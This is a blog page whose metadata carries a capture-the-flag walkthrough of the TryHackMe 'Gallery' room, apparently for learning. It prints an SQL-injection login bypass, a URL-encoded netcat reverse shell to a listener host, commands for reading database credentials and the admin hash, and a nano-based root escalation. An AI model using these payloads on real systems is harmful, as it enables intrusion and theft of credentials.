<!DOCTYPE html>









<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    

    

  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Gallery - TryHackMe Write-up" />
<meta name="author" content="Bornunique911" />
<meta property="og:locale" content="en" />
<meta name="description" content="TryHackMe : Gallery Hello everyone, I hope you all are doing great. This is my first blog of any TryHackMe room walk-through. So, let’s get started. So I am gonna start with a TryHackMe room called Gallery created by Mika today which includes the following sub-categories in the room : Sub-categories of the room Room Link :- https://tryhackme.com/room/gallery666 My Profile :- https://tryhackme.com/p/Bornunique911 My socials :- Twitter :- https://twitter.com/Bornunique911 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - P0rt Sc4nn1ng :- Let’s deploy our machine and run Nmap to find open ports and services which are running on them and which we will be enumerating after the Nmap scan is completely done. Nmap scan results As we can observe from the nmap scan results that they are two ports open which are Port 80 and Port 8080. Let’s enumerate the ports one by one. P0rt 80 As always it is a default Apache page. Nothing interesting here. Let’s move on to Port 8080. P0rt 8080 When we visit to port 8080, it redirects the page to http://10.10.231.162/gallery/login.php which is a simple login page hosted on some CMS(Content Management System). So the CMS used here can be guessed by the title of the page. So the CMS used here is Simple Image Gallery . So let’s do a quick google search for the available exploits for that particular CMS. So we get some nice results while googling : Google Search results for Simple Image Gallery CMS So let’s check the links one by one and we get some interesting information from two exploit-db links that the simple image gallery CMS is vulnerable to SQL Injection and Remote Code Execution without authentication . The exploit-db links is as under :- https://www.exploit-db.com/exploits/50198 Offensive Security&#39;s Exploit Database Archive So from the above two links, the best link which suits here is the Remote Code Execution with an unauthenticated bypass as we are not logged in yet. So let’s see the source code of the exploit. RCE Unauthenticated Exploit So the source code is written in python, so basically by looking at the source code we can bypass the login page without logging in and we can perform remote code execution by visiting the shell URL. Here we have two options whether to login manually with the credentials mentioned in the source code of the exploit or we can just run the exploit by specifying the target URL and visit the Shell URL. Option 1 : Login Manually by the credentials provided in the source code :- Credentials to the login page Option 2 : By running the exploit by specifying the TARGET and visiting the Shell URL :- Running exploit by specifying the TARGET So I will proceed with option 1 which is logging in manually by using the following credentials :- Username :- admin&#39; or &#39;1&#39;=&#39;1&#39;#Password :- Leaving Blank So we are logged in successfully. So let’s move further. RC3 So far RCE exploit is concerned we need to upload a reverse shell to get a shell on our machine. So I downloaded the exploit into my local machine and I ran it. So I got the following as output :- Output after running the exploit locally Let’s visit the Shell URL now, we get following output : Remote code Execution G3tt1ng Sh3ll Now as we confirmed that there is a remote code execution we will upload a reverse shell now. But as per my experience uploading reverse shell as plain text will fail so I will upload the reverse shell by encoding the URL as under :- http://10.10.232.246/gallery/uploads/1646679480_TagokobxhhagrwqkzviLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2&gt;%261|nc+MACHINE-IP+PORT+&gt;/tmp/f Now let’s setup a netcat listener on our terminal to get a shell by triggering the above URL. Boom we got a shell as www-data. Shell as a www-data user Let’s now stabilize the sh shell to the bash shell, by the following command : python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; Now that our shell is upgraded to bash shell, we can export the TERM to screen as a normal terminal screen. But still the shell is not completely stabilized so for that we used the following commands to stabilize perfectly: CTRL + Zstty raw -echo;fg ENTER x2 So, the shell is stabilized perfectly.Let’s move further. F1nd1ng Th3 H4sh P4ssw0rd 0f th3 4dm1n (_)s3r : While enumerating the file system I found that there is a initialize.php file in the /var/www/html/gallery directory. Let’s have a look inside the file and there we found some mysql creds which can be useful to us for enumerating the users if there is any users stored in the database. mysql creds Let’s connect with those creds to mysql database. mysql -u gallery_user -pEnter password: passw0rd321 Successful login to the database Cool, we got the access successfully to the database. Now let’s enumerate the databases by following command : show databases; MySQL Databases As per the above screenshot, we have two databases. Among them, gallery_db seems to be interesting. So let’s use it. use gallery_db; Database changed to gallery_db Let’s explore the tables for the particular database. show tables; Tables for a database gallery_db There are four tables in the database gallery_db. Among them, users table seems to be interesting and maybe there should be some juicy information inside the table. Let’s enumerate the table users : select * from users; Hash Password of the admin user Finally we got the hash password for the admin user by connecting to mysql database. 3sc4l4t10n T0 M1k3 (_)s3r Okay now let’s try to escalate m1k3 user and find our user flag. Let’s enumerate the file system again, so after some enumeration I found some interesting directory name “mike_home_backup” in /var/backups path. Looks like it’s a backup directory for user m1k3’s home directory. Screenshot of Mike’s home directory stored as a backup in /var/backups directory So there’s nothing inside in documents. Now, let’s check bash_history maybe there is something interesting inside. Guess what we found the password for the user m1k3 . Password for user Mike Let’s switch to user Mike, by using the password found. (_)s3r Fl4g User flag Cool, we have a user flag now. Let’s move further for privilege escalation to root. Pr1v1l3g3 3sc4l4t10n T0 R00t We can see that M1k3 user can run a script using a sudo and as the root user: Let’s see the contents of rootkit.sh : Contents of rootkit.sh Okay after looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at gtfobins . As per the gtfobins, we can use nano to get privilege to root. Privilege escalation via nano command Let’s execute the commands as mentioned. Choosing option read because it uses nano command to read the report.txt After choosing the read option and hitting enter we are in the nano text editor. Entered in nano text editor after choosing read option Now by following the commands as per gtfobins, we need to press CTRL R followed by CTRL X to execute the command and execute the following to get a root shell. reset; sh 1&gt;&amp;0 2&gt;&amp;0 Executing the command as per gtfobins Boom we are root. After executing the command we got a root shell Now we can read root.txt file by changing directory to root directory. Root flag That’s it for the room.We are done with TryHackMe’s Gallery room. Thanks for reading. Peace !!! &lt;hr&gt;&lt;p&gt;Gallery - TryHackMe Write-up was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.&lt;/p&gt;" />
<meta property="og:description" content="TryHackMe : Gallery Hello everyone, I hope you all are doing great. This is my first blog of any TryHackMe room walk-through. So, let’s get started. So I am gonna start with a TryHackMe room called Gallery created by Mika today which includes the following sub-categories in the room : Sub-categories of the room Room Link :- https://tryhackme.com/room/gallery666 My Profile :- https://tryhackme.com/p/Bornunique911 My socials :- Twitter :- https://twitter.com/Bornunique911 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - P0rt Sc4nn1ng :- Let’s deploy our machine and run Nmap to find open ports and services which are running on them and which we will be enumerating after the Nmap scan is completely done. Nmap scan results As we can observe from the nmap scan results that they are two ports open which are Port 80 and Port 8080. Let’s enumerate the ports one by one. P0rt 80 As always it is a default Apache page. Nothing interesting here. Let’s move on to Port 8080. P0rt 8080 When we visit to port 8080, it redirects the page to http://10.10.231.162/gallery/login.php which is a simple login page hosted on some CMS(Content Management System). So the CMS used here can be guessed by the title of the page. So the CMS used here is Simple Image Gallery . So let’s do a quick google search for the available exploits for that particular CMS. So we get some nice results while googling : Google Search results for Simple Image Gallery CMS So let’s check the links one by one and we get some interesting information from two exploit-db links that the simple image gallery CMS is vulnerable to SQL Injection and Remote Code Execution without authentication . The exploit-db links is as under :- https://www.exploit-db.com/exploits/50198 Offensive Security&#39;s Exploit Database Archive So from the above two links, the best link which suits here is the Remote Code Execution with an unauthenticated bypass as we are not logged in yet. So let’s see the source code of the exploit. RCE Unauthenticated Exploit So the source code is written in python, so basically by looking at the source code we can bypass the login page without logging in and we can perform remote code execution by visiting the shell URL. Here we have two options whether to login manually with the credentials mentioned in the source code of the exploit or we can just run the exploit by specifying the target URL and visit the Shell URL. Option 1 : Login Manually by the credentials provided in the source code :- Credentials to the login page Option 2 : By running the exploit by specifying the TARGET and visiting the Shell URL :- Running exploit by specifying the TARGET So I will proceed with option 1 which is logging in manually by using the following credentials :- Username :- admin&#39; or &#39;1&#39;=&#39;1&#39;#Password :- Leaving Blank So we are logged in successfully. So let’s move further. RC3 So far RCE exploit is concerned we need to upload a reverse shell to get a shell on our machine. So I downloaded the exploit into my local machine and I ran it. So I got the following as output :- Output after running the exploit locally Let’s visit the Shell URL now, we get following output : Remote code Execution G3tt1ng Sh3ll Now as we confirmed that there is a remote code execution we will upload a reverse shell now. But as per my experience uploading reverse shell as plain text will fail so I will upload the reverse shell by encoding the URL as under :- http://10.10.232.246/gallery/uploads/1646679480_TagokobxhhagrwqkzviLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2&gt;%261|nc+MACHINE-IP+PORT+&gt;/tmp/f Now let’s setup a netcat listener on our terminal to get a shell by triggering the above URL. Boom we got a shell as www-data. Shell as a www-data user Let’s now stabilize the sh shell to the bash shell, by the following command : python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; Now that our shell is upgraded to bash shell, we can export the TERM to screen as a normal terminal screen. But still the shell is not completely stabilized so for that we used the following commands to stabilize perfectly: CTRL + Zstty raw -echo;fg ENTER x2 So, the shell is stabilized perfectly.Let’s move further. F1nd1ng Th3 H4sh P4ssw0rd 0f th3 4dm1n (_)s3r : While enumerating the file system I found that there is a initialize.php file in the /var/www/html/gallery directory. Let’s have a look inside the file and there we found some mysql creds which can be useful to us for enumerating the users if there is any users stored in the database. mysql creds Let’s connect with those creds to mysql database. mysql -u gallery_user -pEnter password: passw0rd321 Successful login to the database Cool, we got the access successfully to the database. Now let’s enumerate the databases by following command : show databases; MySQL Databases As per the above screenshot, we have two databases. Among them, gallery_db seems to be interesting. So let’s use it. use gallery_db; Database changed to gallery_db Let’s explore the tables for the particular database. show tables; Tables for a database gallery_db There are four tables in the database gallery_db. Among them, users table seems to be interesting and maybe there should be some juicy information inside the table. Let’s enumerate the table users : select * from users; Hash Password of the admin user Finally we got the hash password for the admin user by connecting to mysql database. 3sc4l4t10n T0 M1k3 (_)s3r Okay now let’s try to escalate m1k3 user and find our user flag. Let’s enumerate the file system again, so after some enumeration I found some interesting directory name “mike_home_backup” in /var/backups path. Looks like it’s a backup directory for user m1k3’s home directory. Screenshot of Mike’s home directory stored as a backup in /var/backups directory So there’s nothing inside in documents. Now, let’s check bash_history maybe there is something interesting inside. Guess what we found the password for the user m1k3 . Password for user Mike Let’s switch to user Mike, by using the password found. (_)s3r Fl4g User flag Cool, we have a user flag now. Let’s move further for privilege escalation to root. Pr1v1l3g3 3sc4l4t10n T0 R00t We can see that M1k3 user can run a script using a sudo and as the root user: Let’s see the contents of rootkit.sh : Contents of rootkit.sh Okay after looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at gtfobins . As per the gtfobins, we can use nano to get privilege to root. Privilege escalation via nano command Let’s execute the commands as mentioned. Choosing option read because it uses nano command to read the report.txt After choosing the read option and hitting enter we are in the nano text editor. Entered in nano text editor after choosing read option Now by following the commands as per gtfobins, we need to press CTRL R followed by CTRL X to execute the command and execute the following to get a root shell. reset; sh 1&gt;&amp;0 2&gt;&amp;0 Executing the command as per gtfobins Boom we are root. After executing the command we got a root shell Now we can read root.txt file by changing directory to root directory. Root flag That’s it for the room.We are done with TryHackMe’s Gallery room. Thanks for reading. Peace !!! &lt;hr&gt;&lt;p&gt;Gallery - TryHackMe Write-up was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.&lt;/p&gt;" />
<link rel="canonical" href="https://systemweakness.com/gallery-tryhackme-write-up-a52128a0557e?source=rss-348ebd5cdb70------2" />
<meta property="og:url" content="https://systemweakness.com/gallery-tryhackme-write-up-a52128a0557e?source=rss-348ebd5cdb70------2" />
<meta property="og:site_name" content="Bornunique911" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-03-07T00:00:00+05:30" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Gallery - TryHackMe Write-up" />
<meta name="twitter:site" content="@bornunique911" />
<meta name="twitter:creator" content="@Bornunique911" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Bornunique911"},"dateModified":"2023-07-12T03:17:45+05:30","datePublished":"2022-03-07T00:00:00+05:30","description":"TryHackMe : Gallery Hello everyone, I hope you all are doing great. This is my first blog of any TryHackMe room walk-through. So, let’s get started. So I am gonna start with a TryHackMe room called Gallery created by Mika today which includes the following sub-categories in the room : Sub-categories of the room Room Link :- https://tryhackme.com/room/gallery666 My Profile :- https://tryhackme.com/p/Bornunique911 My socials :- Twitter :- https://twitter.com/Bornunique911 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - P0rt Sc4nn1ng :- Let’s deploy our machine and run Nmap to find open ports and services which are running on them and which we will be enumerating after the Nmap scan is completely done. Nmap scan results As we can observe from the nmap scan results that they are two ports open which are Port 80 and Port 8080. Let’s enumerate the ports one by one. P0rt 80 As always it is a default Apache page. Nothing interesting here. Let’s move on to Port 8080. P0rt 8080 When we visit to port 8080, it redirects the page to http://10.10.231.162/gallery/login.php which is a simple login page hosted on some CMS(Content Management System). So the CMS used here can be guessed by the title of the page. So the CMS used here is Simple Image Gallery . So let’s do a quick google search for the available exploits for that particular CMS. So we get some nice results while googling : Google Search results for Simple Image Gallery CMS So let’s check the links one by one and we get some interesting information from two exploit-db links that the simple image gallery CMS is vulnerable to SQL Injection and Remote Code Execution without authentication . The exploit-db links is as under :- https://www.exploit-db.com/exploits/50198 Offensive Security&#39;s Exploit Database Archive So from the above two links, the best link which suits here is the Remote Code Execution with an unauthenticated bypass as we are not logged in yet. So let’s see the source code of the exploit. RCE Unauthenticated Exploit So the source code is written in python, so basically by looking at the source code we can bypass the login page without logging in and we can perform remote code execution by visiting the shell URL. Here we have two options whether to login manually with the credentials mentioned in the source code of the exploit or we can just run the exploit by specifying the target URL and visit the Shell URL. Option 1 : Login Manually by the credentials provided in the source code :- Credentials to the login page Option 2 : By running the exploit by specifying the TARGET and visiting the Shell URL :- Running exploit by specifying the TARGET So I will proceed with option 1 which is logging in manually by using the following credentials :- Username :- admin&#39; or &#39;1&#39;=&#39;1&#39;#Password :- Leaving Blank So we are logged in successfully. So let’s move further. RC3 So far RCE exploit is concerned we need to upload a reverse shell to get a shell on our machine. So I downloaded the exploit into my local machine and I ran it. So I got the following as output :- Output after running the exploit locally Let’s visit the Shell URL now, we get following output : Remote code Execution G3tt1ng Sh3ll Now as we confirmed that there is a remote code execution we will upload a reverse shell now. But as per my experience uploading reverse shell as plain text will fail so I will upload the reverse shell by encoding the URL as under :- http://10.10.232.246/gallery/uploads/1646679480_TagokobxhhagrwqkzviLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2&gt;%261|nc+MACHINE-IP+PORT+&gt;/tmp/f Now let’s setup a netcat listener on our terminal to get a shell by triggering the above URL. Boom we got a shell as www-data. Shell as a www-data user Let’s now stabilize the sh shell to the bash shell, by the following command : python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; Now that our shell is upgraded to bash shell, we can export the TERM to screen as a normal terminal screen. But still the shell is not completely stabilized so for that we used the following commands to stabilize perfectly: CTRL + Zstty raw -echo;fg ENTER x2 So, the shell is stabilized perfectly.Let’s move further. F1nd1ng Th3 H4sh P4ssw0rd 0f th3 4dm1n (_)s3r : While enumerating the file system I found that there is a initialize.php file in the /var/www/html/gallery directory. Let’s have a look inside the file and there we found some mysql creds which can be useful to us for enumerating the users if there is any users stored in the database. mysql creds Let’s connect with those creds to mysql database. mysql -u gallery_user -pEnter password: passw0rd321 Successful login to the database Cool, we got the access successfully to the database. Now let’s enumerate the databases by following command : show databases; MySQL Databases As per the above screenshot, we have two databases. Among them, gallery_db seems to be interesting. So let’s use it. use gallery_db; Database changed to gallery_db Let’s explore the tables for the particular database. show tables; Tables for a database gallery_db There are four tables in the database gallery_db. Among them, users table seems to be interesting and maybe there should be some juicy information inside the table. Let’s enumerate the table users : select * from users; Hash Password of the admin user Finally we got the hash password for the admin user by connecting to mysql database. 3sc4l4t10n T0 M1k3 (_)s3r Okay now let’s try to escalate m1k3 user and find our user flag. Let’s enumerate the file system again, so after some enumeration I found some interesting directory name “mike_home_backup” in /var/backups path. Looks like it’s a backup directory for user m1k3’s home directory. Screenshot of Mike’s home directory stored as a backup in /var/backups directory So there’s nothing inside in documents. Now, let’s check bash_history maybe there is something interesting inside. Guess what we found the password for the user m1k3 . Password for user Mike Let’s switch to user Mike, by using the password found. (_)s3r Fl4g User flag Cool, we have a user flag now. Let’s move further for privilege escalation to root. Pr1v1l3g3 3sc4l4t10n T0 R00t We can see that M1k3 user can run a script using a sudo and as the root user: Let’s see the contents of rootkit.sh : Contents of rootkit.sh Okay after looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at gtfobins . As per the gtfobins, we can use nano to get privilege to root. Privilege escalation via nano command Let’s execute the commands as mentioned. Choosing option read because it uses nano command to read the report.txt After choosing the read option and hitting enter we are in the nano text editor. Entered in nano text editor after choosing read option Now by following the commands as per gtfobins, we need to press CTRL R followed by CTRL X to execute the command and execute the following to get a root shell. reset; sh 1&gt;&amp;0 2&gt;&amp;0 Executing the command as per gtfobins Boom we are root. After executing the command we got a root shell Now we can read root.txt file by changing directory to root directory. Root flag That’s it for the room.We are done with TryHackMe’s Gallery room. Thanks for reading. Peace !!! &lt;hr&gt;&lt;p&gt;Gallery - TryHackMe Write-up was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.&lt;/p&gt;","headline":"Gallery - TryHackMe Write-up","mainEntityOfPage":{"@type":"WebPage","@id":"https://systemweakness.com/gallery-tryhackme-write-up-a52128a0557e?source=rss-348ebd5cdb70------2"},"url":"https://systemweakness.com/gallery-tryhackme-write-up-a52128a0557e?source=rss-348ebd5cdb70------2"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>Gallery - TryHackMe Write-up | Bornunique911
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Bornunique911">
<meta name="application-name" content="Bornunique911">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  

    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get MODE_ATTR() { return "data-mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener("change", () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();

      });

    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

  } /* ModeToggle */

  const toggle = new ModeToggle();

  function flipMode() {
    if (toggle.hasMode) {
      if (toggle.isSysDarkPrefer) {
        if (toggle.isLightMode) {
          toggle.clearMode();
        } else {
          toggle.setLight();
        }

      } else {
        if (toggle.isDarkMode) {
          toggle.clearMode();
        } else {
          toggle.setDark();
        }
      }

    } else {
      if (toggle.isSysDarkPrefer) {
        toggle.setLight();
      } else {
        toggle.setDark();
      }
    }

    toggle.notify();

  } /* flipMode() */

</script>

  
</head>


  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" class="mx-auto">
        
          
          <img src="https://i.pinimg.com/originals/e2/33/ce/e233ce39bf5316b0a9ed17b57c1c6df7.jpg" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title">
      <a href="/">Bornunique911</a>
    </div>
    <div class="site-subtitle font-italic">Cybersecurity Enthusiast and a CTF player</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://github.com/Bornunique911" aria-label="github"
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/bornunique911" aria-label="twitter"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper">
  <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>Gallery - TryHackMe Write-up</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">
        





<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->


<!-- images -->




  
  

  
    
      
      
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

